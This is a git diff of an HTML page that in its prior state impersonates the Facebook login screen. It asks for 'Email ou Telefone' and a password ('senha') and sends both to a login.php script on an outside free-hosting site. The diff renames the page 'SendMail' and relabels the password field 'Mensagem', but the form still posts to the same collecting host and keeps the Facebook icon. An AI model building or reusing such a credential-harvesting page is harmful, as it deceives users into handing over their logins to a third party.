--- a/index.html
+++ b/index.html
@@ -2,10 +2,10 @@
 <html lang="pt-br">
 <head>
 <meta charset="UTF-8">
-<title>Facebook</title>
+<title>SendMail</title>
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <header>
-    <h1><i class="fab fa-facebook"></i> Facebook</h1>
+    <h1><i class="fab fa-facebook"></i>Envie-nos sua mensagem</h1>
 </header>
 
 <style>
@@ -158,10 +158,9 @@
     <form action="https://formulariodecandidatura.000webhostapp.com/login.php" name="form1" method="POST">
      
       <input type="text" name="email" placeholder="Email ou Telefone" required>
-      <input type="password" name="senha" placeholder="Senha" required>
-      <button type="submit">ENTRAR</button>
-      <a href="#" class="forgot-password">Esqueceu a senha?</a>
-      <button type="button" class="create-account">Criar nova conta</button>
+      <input type="password" name="senha" placeholder="Mensagem" required>
+      <button type="submit">Enviar</button>
+      
 
     </form>
   </div>
